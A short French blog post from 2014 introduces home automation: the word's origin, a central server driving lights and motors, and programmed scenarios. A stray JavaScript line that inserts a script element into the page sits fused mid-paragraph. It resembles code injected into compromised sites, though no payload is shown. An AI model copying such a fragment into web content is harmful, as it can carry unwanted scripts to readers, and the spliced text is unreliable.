/, Non classé/Qu’est-ce que la domotique ?

Qu’est-ce que la domotique ?

Faire couler son bain depuis le bureau !
Entrer et piloter la fermeture et ouverture des rideaux et l’allumage de la lumière !
C’est un rêve de science fiction ? Non ! C’est la DOMOTIQUE qui vous permet de réaliser ces exploits dès maintenant.

Comment elle fonctionne ?

L’architecture classique d’un système domotique repose sur un serveur qui  gère différents capteurs et périphériques qui commandent les éclairages, les  motorisations …

Est-ce qu’elle vaut l’investissement ?

Vous trouverez les réponses dans ce présent article.
Le mot domotique est construit à partir du mot latin « Domus » qui signifie « maison », et par analogie avec « électronique ».
La domotique est un système permettant la commande centralisée de tous les appareils et dispositifs ménagers. Son but principal  est d’augmenter le bien être et le luxe.
Elle permet de scénariser les actions en les regroupant en une seule et même fonction appelée scénario domotique. L’objectif d’une telle action est de faciliter le contrôle de la maison et d’éviter des oublis.

maison automatisée3
Domotique poétise aussi avec « automatique » ! Avec quelques systèmes où on n’a même plus besoin d’utiliser des touches, il suffit simplement de programmer des scénarios.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Par | 2014-12-12T09:55:42+00:00 décembre 12th, 2014|Blog domotique, Non classé|Commentaires fermés sur Qu’est-ce que la domotique ?

À propos de l'auteur :